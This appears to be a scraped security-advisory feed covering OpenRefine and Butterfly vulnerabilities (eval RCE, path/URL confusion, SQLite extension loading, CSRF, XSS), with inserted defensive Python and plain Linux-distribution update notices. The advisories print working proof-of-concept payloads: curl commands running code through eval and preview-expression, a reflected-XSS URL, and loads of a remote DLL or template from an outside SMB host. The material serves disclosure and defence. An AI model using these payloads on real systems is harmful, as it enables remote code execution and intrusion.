The bundled credentials should be revoked.

### Workarounds
Users should revoke access to their Google account if they have connected it to OpenRefine.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3PG4-QWC8-426R
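A release-artifact check for the class of leak described above, added here as an example and not OpenRefine's own code: it walks a jar, finds Base64 string literals in text-like members, decodes them, and reports any that decode to a Google OAuth client id or that sit next to a secret-looking identifier. The jar it scans is built in memory with made-up values so it runs offline; the client-id shape (digits, a dash, a lowercase token, `.apps.googleusercontent.com`) is Google's documented format, while the "secret nearby" rule is a heuristic of mine, not a Google format.

```python
"""Scan a release archive for Base64-wrapped OAuth credentials.

Added example; not OpenRefine code. The jar below is constructed in memory
with made-up values so the script runs offline. The client-id pattern follows
Google's documented OAuth client-id format; the "secret nearby" rule is a
heuristic, not a Google format.
"""
import base64
import binascii
import io
import re
import zipfile

B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{20,}={0,2})"')
GOOGLE_CLIENT_ID = re.compile(r"^\d+-[a-z0-9]+\.apps\.googleusercontent\.com$")
SECRET_CONTEXT = re.compile(r"(?i)secret|password|token|api[_-]?key")
TEXT_SUFFIXES = (".java", ".properties", ".xml", ".json", ".js", ".txt")


def decode_b64(token):
    """Strict Base64 decode to ASCII text; None if the literal is not Base64."""
    try:
        return base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_text(name, text):
    """Yield (location, kind, decoded) for suspicious Base64 literals."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        for m in B64_LITERAL.finditer(line):
            decoded = decode_b64(m.group(1))
            if decoded is None:
                continue
            # Context = this line plus the one before it, because Java code
            # often splits "FOO_SECRET = ... decode(" across two lines.
            context = " ".join(lines[max(0, i - 1):i + 1])
            if GOOGLE_CLIENT_ID.match(decoded):
                yield (f"{name}:{i + 1}", "google-client-id", decoded)
            elif SECRET_CONTEXT.search(context):
                yield (f"{name}:{i + 1}", "possible-secret", decoded)


def scan_archive(data):
    """Walk a jar/zip given as bytes; return findings from text-like members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.endswith(TEXT_SUFFIXES):
                text = zf.read(info).decode("utf-8", errors="replace")
                findings.extend(scan_text(info.filename, text))
    return findings


def b64(s):
    return base64.b64encode(s.encode()).decode()


def build_sample_jar():
    """Constructed jar mirroring the advisory's pattern with fake values."""
    fake_id = "000000000000-example0example0example0.apps.googleusercontent.com"
    fake_secret = "not-a-real-secret-0000"
    source = (
        "public class GoogleAPIExtension {\n"
        '    private static final String CLIENT_ID = System.getProperty("ext.gdata.clientid",\n'
        f'            new String(Base64.getDecoder().decode("{b64(fake_id)}")));\n'
        '    private static final String CLIENT_SECRET = System.getProperty("ext.gdata.clientsecret",\n'
        f'            new String(Base64.getDecoder().decode("{b64(fake_secret)}")));\n'
        f'    private static final String BANNER = "{b64("Hello world, nothing to see here")}";\n'
        "}\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("com/example/gdata/GoogleAPIExtension.java", source)
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return buf.getvalue()


if __name__ == "__main__":
    for location, kind, decoded in scan_archive(build_sample_jar()):
        print(f"{location}: {kind}: {decoded}")
```

Run it over every artifact before it is published. A client-id hit is strong because the format is specific; a "possible-secret" hit needs a human look. As the advisory says, once a secret has shipped the only fix is revocation, which is why the check belongs in the release pipeline rather than after the fact.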
24.10.2024 21:27:51maven[MAVEN:GHSA-MPCW-3J5P-P99X] Butterfly's parseJSON, getJSON functions eval malicious input, leading to remote code execution (RCE) (moderate)
### Summary
Usage of the `Butterfly.prototype.parseJSON` or `getJSON` functions on an attacker-controlled crafted input string allows the attacker to execute arbitrary JavaScript code on the server. Since Butterfly JavaScript code has access to Java classes, it can run arbitrary programs.

### Details
The `parseJSON` function (edu/mit/simile/butterfly/Butterfly.js:64) works by calling `eval`, an approach that goes back to the original library by Crockford, before JSON was part of the ECMAScript language. It uses a regular expression to remove strings from the input, then checks that there are no unexpected characters in the non-string remainder.

However, the regex is imperfect, as was [discovered earlier by Mike Samuel](https://dev.to/mikesamuel/2008-silently-securing-jsonparse-5cbb); specifically, the "cleaner" can be tricked into treating part of the input as a string that the "evaluator" does not, because of a difference in interpretation regarding the [Unicode zero-width joiner character](https://unicode-explorer.com/c/200D). Writing that character as `<ZWJ>` (U+200D) so that it is visible, a malicious input looks like:

```js
"\<ZWJ>\", Packages.java.lang.Runtime.getRuntime().exec('gnome-calculator')) // "
```

This is understood...

* by `JSON_cleaning_RE` as a single string, and because it is a string it can be collapsed to nothing, which is not problematic, so the original input proceeds to `eval`.
* by the `eval` function, which ignores zero-width joiners entirely, as a string containing a single escaped backslash, followed by a comma, then a function call, closing parenthesis, and finally a line comment. The function call is evaluated, and a calculator is opened.

Possible mitigations and additional defenses could include:

* Replacing the JSON implementation with Rhino's built-in implementation.
* Dropping all JSON-related and JSONP-related code entirely.
* Restricting the access the JavaScript controller code has to the rest of the system by using `initSafeStandardObjects` instead of `initStandardObjects`, using `setClassShutter`, and so on.

### PoC
Change OpenRefine `core` `controller.js` to add a call to the vulnerable `getJSON` function:

```diff
diff --git a/main/webapp/modules/core/MOD-INF/controller.js b/main/webapp/modules/core/MOD-INF/controller.js
index 4ceba0676..1ce0936d2 100644
--- a/main/webapp/modules/core/MOD-INF/controller.js
+++ b/main/webapp/modules/core/MOD-INF/controller.js
@@ -631,0 +632,5 @@ function process(path, request, response) {
+ if (path == "getjsontest") {
+ butterfly.getJSON(request);
+ return true;
+ }
+
```

Then, restart OpenRefine and submit the malicious request. For example, the following `bash` command (with $' quoting) should do it:

```bash
curl -H 'Content-Type: application/json;charset=utf-8' --data $'"\\\u200d\\", Packages.java.lang.Runtime.getRuntime().exec(\'gnome-calculator\')) // "' http://localhost:3333/getjsontest
```

### Impact
Any JavaScript controller that calls one of these functions is vulnerable to remote code execution. OpenRefine itself seems unaffected; both OpenRefine and jQuery have their own functions also called parseJSON and getJSON, but those are unrelated.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MPCW-3J5P-P99X
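Review bot: the `getjsontest` branch added to `process()` hands the raw request to `butterfly.getJSON(request)` with no authentication, content-type or size check, which is exactly the unprotected call the advisory is demonstrating; that is fine for a proof of concept, but keep the hunk on a throwaway branch, never ship it, and prefer `===` over `==` for the `path` comparison if it is kept locally. The hunk also carries no trailing context after its final empty `+` line, so confirm that it still lands after line 631 of `process()` in the current `controller.js` before applying it.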
25.10.2024 00:46:19maven[MAVEN:GHSA-3P8V-W8MR-M3X8] Butterfly has path/URL confusion in resource handling leading to multiple weaknesses (critical)
### Summary
The Butterfly framework uses the `java.net.URL` class to refer to (what are expected to be) local resource files, like images or templates. This works: "opening a connection" to these URLs opens the local file. However, if a `file:/` URL is directly given where a relative path (resource name) is expected, this is also accepted in some code paths; the app then fetches the file, from a remote machine if indicated, and uses it as if it was a trusted part of the app's codebase.

This leads to multiple weaknesses and potential weaknesses:

* An attacker that has network access to the application could use it to gain access to files, either on the server's filesystem (path traversal) or shared by nearby machines (server-side request forgery with e.g. SMB).
* An attacker that can lead or redirect a user to a crafted URL belonging to the app could cause arbitrary attacker-controlled JavaScript to be loaded in the victim's browser (cross-site scripting).
* If an app is written in such a way that an attacker can influence the resource name used for a template, that attacker could cause the app to fetch and execute an attacker-controlled template (remote code execution).

### Details
The `edu.mit.simile.butterfly.ButterflyModuleImpl.getResource` method converts a resource name into a URL, for instance:

```
images/logo-gem-126.svg
file:/C:/Users/Wander/IdeaProjects/OpenRefine/main/webapp/modules/core/images/logo-gem-126.svg
```

If the resource name already starts with `file:/`, it is passed through unmodified (line 287). There is no check that the resulting URL is inside the expected directory or on the same machine.

The default implementation for `process` in `ButterflyModuleImpl` is to serve a named resource, which makes it vulnerable. The Velocity template library is bound to the same `getResource` implementation through the `ButterflyResourceLoader` class, which means it is also vulnerable if template resource names can somehow be influenced by an attacker.

### PoC
This demonstration has been tested with [OpenRefine](https://github.com/OpenRefine/OpenRefine) on a Windows machine. Start OpenRefine, create a file (here `example.js`) with some contents, then concatenate the OpenRefine URL and its `file:/` URL, as follows:

http://localhost:3333/file:/C:/Users/Wander/example.js

The file is read and sent to the browser. Then, visit:

http://localhost:3333/file:%2f%2fwandernauta.nl/public/demo.html

Assuming there are no firewalls in the way, the HTML page is retrieved from the public SMB (Samba) network share and sent to the browser, which executes the embedded JavaScript.

In the case of OpenRefine specifically, to demonstrate the attacker-controlled template name case:

http://localhost:3333/file:%2f%2fwandernauta.nl/public/index

An `index.vt` template containing the snippet above is retrieved from the same share, which is then executed; the Windows calculator opens.

### Impact
Depending on how the framework is used: path traversal, XSS, SSRF; potentially RCE.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3P8V-W8MR-M3X8
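One way to implement the missing confinement check for both OpenRefine's `LoadLanguageCommand` (GHSA-QFWQ-6JH6-8XX4 above, where a `lang` tag is spliced into `translations-<lang>.json`) and Butterfly's `getResource` (this advisory, where a name may arrive as a `file:/` URL, percent-encoded, or with `..` segments). This is an added example in Python, not the projects' Java: percent-decode the name first, reject anything that carries a URL scheme so `file:/` and `file:%2f%2fhost/...` never reach a URL class, reject absolute and UNC paths, then resolve against the base directory and require the real path to stay under it. The language-tag allow-list, the directory layout and the helper names are my assumptions.

```python
"""Confine caller-supplied resource names to one directory.

Added example; not OpenRefine or Butterfly code. Directory layout, the
language-tag allow-list and the helper names are assumptions for the demo.
"""
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote, urlsplit

# Assumed allow-list for language tags such as "en", "pt-BR", "zh_CN".
LANG_RE = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z0-9]{2,8})*")


class ResourceError(ValueError):
    """Raised for any name that must not be turned into a file or URL."""


def resolve_resource(base_dir, name):
    """Map a resource name to a Path under base_dir or raise ResourceError.

    Order matters: decode percent-encoding first (so "file:%2f%2fhost/x" is
    seen as a URL), refuse anything with a scheme, refuse absolute and UNC
    paths, then resolve symlinks and ".." and check the real path is below
    base_dir.
    """
    name = unquote(name)
    if urlsplit(name).scheme:
        raise ResourceError(f"URL where a resource name was expected: {name!r}")
    if name.startswith(("/", "\\")) or os.path.isabs(name):
        raise ResourceError(f"absolute or UNC path not allowed: {name!r}")
    base = Path(base_dir).resolve()
    target = (base / name).resolve()
    if base not in target.parents:
        raise ResourceError(f"escapes base directory: {name!r}")
    return target


def language_file(base_dir, lang):
    """Build translations-<lang>.json the way LoadLanguageCommand does, but
    with an allow-list on the tag and the confinement check on the result."""
    if not LANG_RE.fullmatch(lang):
        raise ResourceError(f"bad language tag: {lang!r}")
    return resolve_resource(base_dir, f"translations-{lang}.json")


def is_allowed(base_dir, name):
    try:
        resolve_resource(base_dir, name)
        return True
    except ResourceError:
        return False


def language_allowed(base_dir, lang):
    try:
        language_file(base_dir, lang)
        return True
    except ResourceError:
        return False


def make_demo_dir():
    """Constructed module directory: one image and one translation file."""
    d = Path(tempfile.mkdtemp())
    (d / "images").mkdir()
    (d / "images" / "logo-gem-126.svg").write_text("<svg/>")
    (d / "translations-en.json").write_text('{"hello": "Hello"}')
    return str(d)


if __name__ == "__main__":
    d = make_demo_dir()
    for n in ["images/logo-gem-126.svg", "file:/etc/passwd",
              "file:%2f%2fexample.invalid/share/demo.html",
              "../../etc/passwd", "images/../../../etc/passwd"]:
        print(f"{n!r:50} -> {'ok' if is_allowed(d, n) else 'rejected'}")
    for lang in ["en", "zh_CN", "../../../etc/passwd"]:
        print(f"lang {lang!r:25} -> {'ok' if language_allowed(d, lang) else 'rejected'}")
```

The two checks are deliberately layered: the allow-list on `lang` is the cheap, specific fix for the load-language endpoint, and the `resolve()`-then-`parents` test is the general one the advisory asks for, so a future caller that builds a different file name from user input is still covered.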
25.10.2024 00:46:04 | maven | [MAVEN:GHSA-J8HP-F2MJ-586G] OpenRefine's error page lacks escaping, leading to potential Cross-site Scripting on import of malicious project (moderate)

### Summary

The built-in "Something went wrong!" error page includes the exception message and exception traceback without escaping HTML tags, enabling injection into the page if an attacker can reliably produce an error with an attacker-influenced message.

It appears that the only way to reach this code in OpenRefine itself is for an attacker to somehow convince a victim to import a malicious file, as in GHSA-m88m-crr9-jvqq, which may be difficult. However, out-of-tree extensions may add their own calls to `respondWithErrorPage`.

### Details

The `Command.respondWithErrorPage` (through `HttpUtilities.respondWithErrorPage`) function renders the Velocity template `error.vt`, which contains the `$message` and `$stack` variables, which are included in the response as-is:

https://github.com/OpenRefine/OpenRefine/blob/master/main/webapp/modules/core/error.vt#L52-L53

However, the message can contain HTML tags, which would then be interpreted by the browser. A mitigation would be to escape both the message and stack trace, perhaps using Guava's HTML escaper.

Flows that report errors as `application/json` responses are not interpreted by the browser and so are not affected by this issue.

### PoC

In OpenRefine, use the "Import project" feature to import the following URL (or upload it as a file):

https://wandernauta.nl/oa/example.tar.gz

A JavaScript alert appears.

### Impact

Execution of arbitrary JavaScript in the victim's browser, provided the victim can be convinced to import a malicious project. The script can do anything the user can do.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J8HP-F2MJ-586G
24.10.2024 21:11:21 | maven | [MAVEN:GHSA-87CF-J763-VVH8] OpenRefine's SQLite integration allows filesystem access, remote code execution (RCE) (high)

### Summary

In the `database` extension, the "enable_load_extension" property can be set for the SQLite integration, enabling an attacker to load (local or remote) extension DLLs and so run arbitrary code on the server.

The attacker needs to have network access to the OpenRefine instance.

### Details

The `database` extension, with some restrictions, lets users connect to any database they wish by filling in different parts of the JDBC URL that is used. For the SQLite integration, the extension expects a file path pointing to a database file (or a place where such a file can be created). This means that users can:

* Read files on local or SMB filesystems, provided they are SQLite databases.
* Write to files on local or SMB filesystems, as long as those files are either SQLite databases or empty.

This seems to be the expected behavior.

However, by adding `?enable_load_extension=true` to the filename, a [feature](https://www.sqlite.org/loadext.html) is toggled that additionally allows loading and executing shared libraries mentioned in queries, leading to remote code execution. On Windows specifically, those libraries may also come from shared folders.

Possible mitigation and hardening steps could include:

- Having users upload the SQLite database file they want to look at, storing it under some safe name, then opening that, rather than accepting a file path
- If that is not feasible: making the path relative to, and checking that it does not escape, the workspace directory
- If that is also not feasible: adding additional checks so that the path at least does not point to other machines or add JDBC parameters
- Always using the READONLY open mode
- Explicitly setting enable_load_extension to off
- Enforcing [stricter limits](https://www.sqlite.org/security.html) and similar precautions

### PoC

Tested on a Windows 11 machine.

1. Start OpenRefine and choose "Create project", "Database", database type "SQLite".
2. Type a writable file path followed by `?enable_load_extension=true`.
3. Click Connect. The connection should succeed.
4. Use `SELECT load_extension('\\wandernauta.nl\public\libcalculator.dll');` as the query.
5. Assuming there are no firewalls in the way, a few Windows calculators should open.

The same file is available from https://wandernauta.nl/libcalculator.dll if needed.

### Impact

Remote code execution for attackers with network access to OpenRefine.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-87CF-J763-VVH8
25.10.2024 00:46:03 | maven | [MAVEN:GHSA-79JV-5226-783F] OpenRefine has a reflected cross-site scripting vulnerability (XSS) from POST request in ExportRowsCommand (high)

### Summary

The `export-rows` command can be used in such a way that it reflects part of the request verbatim, with a Content-Type header also taken from the request.

An attacker could lead a user to a malicious page that submits a form POST that contains embedded JavaScript code. This code would then be included in the response, along with an attacker-controlled `Content-Type` header, and so potentially executed in the victim's browser as if it were part of OpenRefine.

The attacker must know a valid project ID of a project that contains at least one row.

### Details

The malicious form sets `contentType` to `text/html` (ExportRowsCommand.java line 101) and `preview` to `true` (line 107). This combination causes the browser to treat what OpenRefine thinks of as an export preview as a regular webpage.

It would be safer if the `export-rows` command did not allow overriding the Content-Type header at all, instead relying on the exporter to provide the correct Content-Type. It could also require a CSRF token. As an additional measure, it could add a Content-Security-Policy header to the response disabling scripts and such entirely.

At least the CSV exporter (`separator` and `lineSeparator` fields) and templating exporter (any field) are affected. It may also be possible to inject into the `dateSettings.custom` field or the SQL exporter default value field, if the project contains date or null cells.

### PoC

An example form that demonstrates the issue is available on https://wandernauta.nl/os/.

### Impact

Execution of arbitrary JavaScript in the user's browser. The attacker-provided code can do anything the user can do, including deleting projects, retrieving database passwords, or executing arbitrary Jython or Clojure expressions, if those extensions are also present.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-79JV-5226-783F
25.10.2024 00:46:01 | maven | [MAVEN:GHSA-3JM4-C6QF-JRH3] OpenRefine's PreviewExpressionCommand, which is eval, lacks protection against cross-site request forgery (CSRF) (high)

### Summary

Lack of CSRF protection on the `preview-expression` command means that visiting a malicious website could cause an attacker-controlled expression to be executed. The expression can contain arbitrary Clojure or Python code.

The attacker must know a valid project ID of a project that contains at least one row.

### Details

The `com.google.refine.commands.expr.PreviewExpressionCommand` class contains the following comment:

```
/**
 * The command uses POST but does not actually modify any state so it does not require CSRF.
 */
```

However, this appears to be false (or no longer true). The expression being previewed (executed) can be written in GREL, Python, or Clojure. Since there are no restrictions on what code can be executed, the expression can do anything the user running OpenRefine can do. For instance, the following expressions start a calculator:

```
clojure:(.exec (Runtime/getRuntime) "gnome-calculator")
```

```
jython:import os;os.system("gnome-calculator")
```

The lack of restrictions on expressions is arguably not a problem if the user is typing their own expressions into OpenRefine: they could have just as well typed them into Clojure or Python directly. However, since the `preview-expression` command does not check for a CSRF token, the expression can actually come from an HTML form submitted by a different origin, including arbitrary websites.

Issue #2164 suggested adding CSRF protection to all endpoints, but this endpoint was skipped (and the above comment added) in the associated PR #2182.

### PoC

An example "malicious" page is at https://wandernauta.nl/or/ (of course, actual malicious pages would not wait for the victim to press the submit button).

The following curl command (substituting the project ID) also demonstrates the issue:

```sh
curl -d project=123456789 -d cellIndex=1 -d rowIndices='[0]' -d 'expression=clojure:(.exec (Runtime/getRuntime) "gnome-calculator")' http://localhost:3333/command/core/preview-expression/
```

### Impact

CSRF into remote code execution, provided the attacker knows at least one project ID in the victim's workspace and can convince the victim to open a malicious webpage.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3JM4-C6QF-JRH3
25.10.2024 00:46:01 | maven | [MAVEN:GHSA-PW3X-C5VP-MFC3] OpenRefine has a reflected cross-site scripting vulnerability (XSS) in GData extension (authorized.vt) (high)

### Summary

The `/extension/gdata/authorized` endpoint includes the `state` GET parameter verbatim in a `<script>` tag in the output, i.e. without escaping.

An attacker could lead or redirect a user to a crafted URL containing JavaScript code, which would then cause that code to be executed in the victim's browser as if it were part of OpenRefine.

### Details

The `state` GET parameter is read from:

* extensions/gdata/module/MOD-INF/controller.js:105

It is used (as `$state`) in:

* extensions/gdata/module/authorized.vt:43

There is no check that the state has the expected format (base64-encoded JSON with values like "openrefine123..." and "cb123..."), or that the page was indeed opened as part of the authorization flow.

### PoC

Navigate to:

http://localhost:3333/extension/gdata/authorized?state=%22,alert(1),%22&error=

An alert box pops up.

The gdata extension needs to be present. No other configuration is needed; specifically, it is not required to have a client ID or client secret set.

### Impact

Execution of arbitrary JavaScript in the user's browser. The attacker-provided code can do anything the user can do, including deleting projects, retrieving database passwords, or executing arbitrary Jython or Clojure expressions, if those extensions are also present.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PW3X-C5VP-MFC3
24.10.2024 22:00:47 | maven | [MAVEN:GHSA-JMRF-85G8-X8XV] Apache Syncope: Stored XSS in Console and Enduser (moderate)

When editing objects in the Syncope Console, incomplete HTML tags could be used to bypass HTML sanitization. This made it possible to inject stored XSS payloads which would trigger for other users during ordinary usage of the application.

XSS payloads could also be injected in Syncope Enduser when editing "Personal Information" or "User Requests": such payloads would trigger for administrators in Syncope Console, thus enabling session hijacking.

Users are recommended to upgrade to version 3.0.9, which fixes this issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JMRF-85G8-X8XV
24.10.2024 15:33:56 | rubysec | [RUBYSEC:CAMALEON_CMS-2024-48652] camaleon_cms affected by cross site scripting (medium) | Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allows a remote attacker to execute arbitrary code via the content group name field. | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-2024-48652
24.10.2024 11:49:12 | almalinux | [ALSA-2024:8353] NetworkManager-libreswan security update (important) | NetworkManager-libreswan security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8353
24.10.2024 10:32:06 | almalinux | [ALSA-2024:8374] python3.11 security update (moderate) | python3.11 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8374
24.10.2024 10:36:13 | almalinux | [ALSA-2024:8359] python39:3.9 and python39-devel:3.9 security update (moderate) | python39:3.9 and python39-devel:3.9 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8359
26.10.2024 06:15:48 | fedora | [FEDORA-2024-180560c54b] Fedora 39: dotnet8.0

This is the October 2024 security release of .NET 8. The SDK version is 8.0.110 and the Runtime version is 8.0.10.

Release Notes:
SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.110.md
Runtime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.10.md

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-180560c54b

26.10.2024 06:12:48 | fedora | [FEDORA-2024-204d982a2e] Fedora 40: dotnet8.0

This is the October 2024 security release of .NET 8. The SDK version is 8.0.110 and the Runtime version is 8.0.10.

Release Notes:
SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.110.md
Runtime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.10.md

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-204d982a2e

26.10.2024 06:05:01 | fedora | [FEDORA-2024-a078d86829] Fedora 41: thunderbird

Update to 128.3.3
https://www.thunderbird.net/en-US/thunderbird/128.3.3esr/releasenotes/
Update to 128.3.2
https://www.thunderbird.net/en-US/thunderbird/128.3.2esr/releasenotes/
Update to 128.3.1
https://www.thunderbird.net/en-US/thunderbird/128.3.1esr/releasenotes/
Update to 128.3.0
https://www.mozilla.org/en-US/security/advisories/mfsa2024-49/
https://www.thunderbird.net/en-US/thunderbird/128.3.0esr/releasenotes/

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a078d86829

26.10.2024 06:04:51 | fedora | [FEDORA-2024-2e8944621e] Fedora 41: NetworkManager-libreswan

This is an update to 1.2.24 release of NetworkManager-libreswan, the IPSec VPN plugin for NetworkManager. It fixes a local privilege escalation bug due to improper escaping of Libreswan configuration. (CVE-2024-9050)

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2e8944621e

26.10.2024 06:04:30 | fedora | [FEDORA-2024-3a6f9ab958] Fedora 41: chromium

Update to 130.0.6723.58
* High CVE-2024-9954: Use after free in AI
* Medium CVE-2024-9955: Use after free in Web Authentication
* Medium CVE-2024-9956: Inappropriate implementation in Web Authentication
* Medium CVE-2024-9957: Use after free in UI
* Medium CVE-2024-9958: Inappropriate implementation in PictureInPicture
* Medium CVE-2024-9959: Use after free in DevTools
* Medium CVE-2024-9960: Use after free in Dawn
* Medium CVE-2024-9961: Use after free in Parcel Tracking
* Medium CVE-2024-9962: Inappropriate implementation in Permissions
* Medium CVE-2024-9963: Insufficient data validation in Downloads
* Low CVE-2024-9964: Inappropriate implementation in Payments
* Low CVE-2024-9965: Insufficient data validation in DevTools
* Low CVE-2024-9966: Inappropriate implementation in Navigations

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3a6f9ab958

26.10.2024 06:04:20 | fedora | [FEDORA-2024-cc3d21b83b] Fedora 41: dotnet8.0

This is the October 2024 security release of .NET 8. The SDK version is 8.0.110 and the Runtime version is 8.0.10.

Release Notes:
SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.110.md
Runtime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.10.md

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cc3d21b83b

26.10.2024 06:03:47 | fedora | [FEDORA-2024-8f1374ecfb] Fedora 41: mbedtls3.6 | Update to 3.6.2. Release notes: https://github.com/Mbed-TLS/mbedtls/releases/tag/mbedtls-3.6.2 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8f1374ecfb

26.10.2024 06:03:45 | fedora | [FEDORA-2024-05dedb1a53] Fedora 41: python-platformio, python-openapi-core, python-fastapi, python-starlette

Security fix for CVE-2024-47874.

Starlette 0.40.0 (October 15, 2024)
This release fixes a Denial of service (DoS) via multipart/form-data requests. You can view the full security advisory: GHSA-f96h-pmfr-66vw
Fixed
Add max_part_size to MultiPartParser to limit the size of parts in multipart/form-data requests fd038f3.

FastAPI 0.115.2
https://github.com/fastapi/fastapi/releases/tag/0.115.2
https://github.com/fastapi/fastapi/releases/tag/0.115.1

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-05dedb1a53

26.10.2024 06:03:37 | fedora | [FEDORA-2024-362915851c] Fedora 41: yarnpkg | Update bundled ws (CVE-2024-37890). Update bundled elliptic to fix CVE-2024-48949. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-362915851c
26.10.2024 06:03:37 | fedora | [FEDORA-2024-21666fa7f2] Fedora 41: rust-pyo3, rust-pyo3-macros, rust-pyo3-build-config, rust-pyo3-ffi, rust-pyo3-macros-backend | Update pyo3 to version 0.22.4. This version addresses a potential use-after-free RUSTSEC-2024-0378. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-21666fa7f2
26.10.2024 06:03:22 | fedora | [FEDORA-2024-b5da13e80a] Fedora 41: suricata | Various security, performance, accuracy, and stability issues have been fixed. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b5da13e80a
26.10.2024 06:02:39 | fedora | [FEDORA-2024-17a3b4d4c3] Fedora 41: python-rpyc | Fix CVE-2024-27758 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-17a3b4d4c3
26.10.2024 06:02:38 | fedora | [FEDORA-2024-fd57a07560] Fedora 41: oath-toolkit | This is a new version fixing a possible local privilege escalation. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-fd57a07560
26.10.2024 06:02:29 | fedora | [FEDORA-2024-f474f99541] Fedora 41: libdigidocpp | Upstream release of libdigidocpp | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f474f99541
26.10.2024 06:01:58 | fedora | [FEDORA-2024-73b41ae8e5] Fedora 41: dnsdist | Update to latest upstream | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-73b41ae8e5
25.10.2024 13:30:29 | suse | [SUSE-SU-2024:3757-1] Security update for openssl-1_1 (moderate) | Security update for openssl-1_1 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3757-1
25.10.2024 09:30:33 | almalinux | [ALSA-2024:8162] kernel security update (moderate) | kernel security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8162
28.10.2024 05:54:30 | fedora | [FEDORA-2024-69528c0ba6] Fedora 40: prometheus-podman-exporter | release 1.13.3 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-69528c0ba6
28.10.2024 05:54:29 | fedora | [FEDORA-2024-afa796a751] Fedora 40: podman-tui | release 1.2.3 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-afa796a751
28.10.2024 05:54:18 | fedora | [FEDORA-2024-45df72afc6] Fedora 40: edk2 | Security fix for CVE-2023-6237 (openssl: Excessive time spent checking invalid RSA public keys) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-45df72afc6

28.10.2024 03:05:28 | fedora | [FEDORA-2024-6a0e07c9c7] Fedora 39: chromium

update to 130.0.6723.69
* High CVE-2024-10229: Inappropriate implementation in Extensions
* High CVE-2024-10230: Type Confusion in V8
* High CVE-2024-10231: Type Confusion in V8

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6a0e07c9c7

28.10.2024 03:04:59 | fedora | [FEDORA-2024-ee9f0f22b6] Fedora 39: prometheus-podman-exporter | release 1.13.3 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ee9f0f22b6
28.10.2024 03:04:58 | fedora | [FEDORA-2024-1068d5c32b] Fedora 39: podman-tui | release 1.2.3 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1068d5c32b
28.10.2024 03:04:52 | fedora | [FEDORA-2024-df41d584d0] Fedora 39: glibc

Auto-sync with upstream branch release/2.38/master
Add BuildRequires: gzip for compressed character maps and info files.
Upstream commit: 4dd8641461463b667b5503ab0ea4abcf261378a9
Add crt1-2.0.o for glibc 2.0 compatibility tests
libio: Attempt wide backup free only for non-legacy code
nptl: Use facilities in tst-setuid3
posix: Use facilities in tst-truncate and tst-truncate64
ungetc: Fix backup buffer leak on program exit [BZ #27821]
ungetc: Fix uninitialized read when putting into unused streams [BZ #27821]
Make tst-ungetc use libsupport
stdio-common: Add test for vfscanf with matches longer than INT_MAX [BZ #27650]
support: Add FAIL test failure helper
x86: Fix bug in strchrnul-evex512 [BZ #32078]
Fix name space violation in fortify wrappers (bug 32052)
resolv: Fix tst-resolv-short-response for older GCC (bug 32042)
Update syscall lists for Linux 6.5
Add mremap tests
mremap: Update manual entry
linux: Update the mremap C implementation [BZ #31968]
resolv: Track single-request fallback via _res._flags (bug 31476)
resolv: Do not wait for non-existing second DNS response after error (bug 30081)
resolv: Allow short error responses to match any query (bug 31890)
Linux: Make __rseq_size useful for feature detection (bug 31965)
elf: Make dl-rseq-symbols Linux only
nptl: fix potential merge of __rseq_* relro symbols
s390x: Fix segfault in wcsncmp [BZ #31934]
